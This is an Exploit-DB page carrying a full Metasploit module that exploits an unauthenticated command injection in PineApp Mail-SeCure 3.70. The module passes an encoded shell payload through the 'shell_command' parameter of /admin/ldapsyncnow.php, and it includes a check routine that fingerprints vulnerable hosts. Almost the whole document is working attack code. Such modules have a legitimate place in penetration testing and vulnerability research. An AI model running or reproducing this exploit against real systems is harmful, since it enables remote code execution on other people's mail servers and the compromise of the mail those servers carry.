PineApp Mail-SeCure - 'ldapsyncnow.php' Arbitrary Command Execution (Metasploit)

EDB-ID:

27294

CVE:


EDB Verified:

Author:

Metasploit

Type:

remote

Exploit:   /  

Platform:

PHP

Date:

2013-08-02

Vulnerable App: 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution',
      'Description'    => %q{
          This module exploits a command injection vulnerability on PineApp Mail-SeCure
        3.70. The vulnerability exists on the ldapsyncnow.php component, due to the insecure
        usage of the shell_exec() php function. This module has been tested successfully
        on PineApp Mail-SeCure 3.70.
      },
      'Author'         =>
        [
          'Dave Weinstein', # Vulnerability discovery
          'juan vazquez'    # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-185/']
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl python telnet'
            }
        },
      'Targets'        =>
        [
          [ 'PineApp Mail-SeCure 3.70', { }]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 26 2013'
      ))

    register_options(
      [
        Opt::RPORT(7443)
      ],
      self.class
    )

  end

  def my_uri
    return normalize_uri("/admin/ldapsyncnow.php")
  end

  def check
    # Since atm of writing this exploit there isn't patch available,
    # checking for the vulnerable component should be a reliable test.
    res = send_request_cgi({
      'uri' => my_uri,
      'vars_get' => {
        'sync_now' =>'1'
      }
    })
    if res and res.code == 200 and res.body =~ /window\.setTimeout\('loaded\(\)', 2500\);/
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{rhost}:#{rport} - Executing payload...")
    send_request_cgi({
      'uri' => my_uri,
      'vars_get' => {
        'sync_now' =>'1', # must be 1 in order to trigger the vulnerability
        'shell_command' => payload.encoded
      }
    })
  end

end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services